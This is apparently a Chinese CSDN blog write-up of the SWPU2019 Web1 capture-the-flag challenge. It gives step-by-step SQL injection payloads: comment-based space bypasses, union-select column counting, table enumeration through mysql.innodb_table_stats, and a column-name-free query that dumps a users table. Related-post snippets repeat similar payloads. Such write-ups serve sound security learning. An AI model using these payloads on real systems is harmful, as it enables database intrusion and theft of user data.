[SWPU2019]Web11--writeup

已于 2023-08-18 20:50:06 修改
阅读量107 收藏
点赞数
分类专栏: web--writeup 文章标签: sql 数据库
于 2023-08-18 16:15:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65080524/article/details/132363659
版权

打开 注册登录

 申请发布广告

 

存在过滤 ---and,order by…空格,#,information_schema.tables也被过滤了

当order by被过滤可以试试group by 

空格通过/**/ 绕过 #由’闭合绕过

判断出有22列

 -1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

 查看回显 是2,3

-1'union/**/select/**/1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

 爆库名 web1

可利用

①mysql.innodb_table_stats
②sys.schema_auto_increment_columns 进行绕过

1'/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'
 

 但无法报列名  于是采用无列名爆值

-1'union/**/select/**/1, (select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 
 

Cabbage%
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
[SWPU2019]Web11
m0_62805300的博客
05-02 1113
试试注册页面 admin被注册了试试其他的 登录进去有这样一个页面 有报错信息 有过滤 再尝试几次发现过滤了空格,and,or等(可用fuzz字典) 确定字段 查询数据库 ...
sql注入information_schema代替,无列名注入之[SWPU2019]Web11
qq_58970968的博客
08-10 851
的时候,有时候information_schema这个库可能会因为过滤而无法调用,这时我们就不能通过这个库来查出表名和列名。但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。但是mysql.innodb_table_stats只查到表名,所以不知道列名;information_schema可以查到所有的数据库和表名和列名;当or 被过滤时不能使用information_schema;这道题过滤了空格,用/**/绕过;...
BUUCTF:[SWPU2019]Web3
末初的CSDN博客
04-21 1531
参考:https://www.leavesongs.com/PENETRATION/client-session-security.html http://forever404.cn/2019/12/14/SWPU2019web%E5%A4%8D%E7%8E%B0/ 点击upload有权限设置,猜测cookie伪造 权限不够,查看session 使用P师傅的脚本可以解这个session...
buuctf [SWPU2019]Web1 1
weixin_45642610的博客
03-13 1553
buuctf [SWPU2019]Web1 1 sql 无列名注入 注册登录发布广告 1'测试 存在sql注入 经测试,or,空格,#被过滤 不能用order by测试列数,用group by代替 注释符#用,'3代替,数字随便 (这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语句末尾,那不是失败了?有无懂哥?) 空格用/**/代替 1'/**/group/**/by/**/22,'3 1'/**/group/**/by/**/23,'
[SWPU2019]Web1
weixin_43940853的博客
01-15 2947
这是一个留言板的二次注入 当时自己用的是报错注入,结果并没有做出来,看其他人的wp用的是union注入,并且有22个字段
SWPUCTF2019web题复现
bmth666的博客
04-05 1154
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
BUUCTF [SWPU2019] Web3
Senimo
12-20 787
BUUCTF [SWPU2019] Web3 考点: 启动环境: 首先是一个登陆页面,标题为:CTF-Flask-Demo,推测其应为Flask所编写,尝试使用admin用户登陆: 用户名:admin、密码:admin,登陆成功: 又尝试了几个登陆密码,应该是没有验证,随便登陆 其中有文件上传功能,点击upload: 提示权限不足,考虑其为session判断权限,使用BurpSuite查看页面Cookie信息: 注:在Flask中,session是保存在Cookie中,也就是本地,所以可以直接读取其内
campus-recruitment-guidance:柚柚子帮校招指导服务平台,SWPU-2017级-码之泪殇毕业设计
04-01
整个平台包含微信小程序端和web 管理端两部分,项目开发采用前分割分离,这里是嵌入式项目工程,基于SpringBoot构造,对接为小程序提供数据接口服务。涉及的技术栈: SpringBoot->初步基础环境Shiro->安全框架JWT->...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
ctf逆向解题——re1-附件资源
03-05
ctf逆向解题——re1-附件资源
YS-Mini语音合成配套资料
03-29
对于需要使用LD3320语音模块在51单片机上面的朋友来说,这一个程序是一个很好的demo,对于移植也很方便。
Innodb Buffer Pool缓存机制(一)一条sql的执行过程
moneywenxue的博客
05-22 464
一条sql的执行过程
父子级分类统计分类下数量sql
pscool的博客
05-19 161
【代码】父子级分类统计分类下数量sql
解锁数据关联之道:SQL 表连接详解
最新发布
zwldn的博客
05-22 1268
详细介绍了 SQL 中的表连接操作,通过表连接,可以将多个表中的数据关联起来,实现数据的关联查询、聚合计算、复杂条件筛选和性能优化等功能。
SQL面试题练习 —— 连续登录超过N天用户(一)
hu_wei123的博客
05-21 185
现有用户登录日志表 t_login_log,包含用户ID(user_id),登录日期(login_date)。数据已经按照用户日期去重,请查出连续登录超过4天的用户ID。
PostgreSQL事务基础理解
阿楠的博客
05-18 671
PostgreSQL支持保存点的功能,在一个大的事务中,可以把操作过程分为几个部分,每个部分执行成功后可以建一个保存点,若后边的部分执行失败,则会回滚到次保存点,无需回滚整个事务。
sql去除表中某个字段的空格
HelloWorld的专栏
05-20 197
比如表中名字字段,名字之间有空格,需要把空格去除,应该如何写SQL语句实现?函数来去除字符串两端的空格,如果需要去除字段中的所有空格,可以使用。以下是一个示例,假设我们有一个名为。的表,并且我们想要去除。在SQL中,可以使用。
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值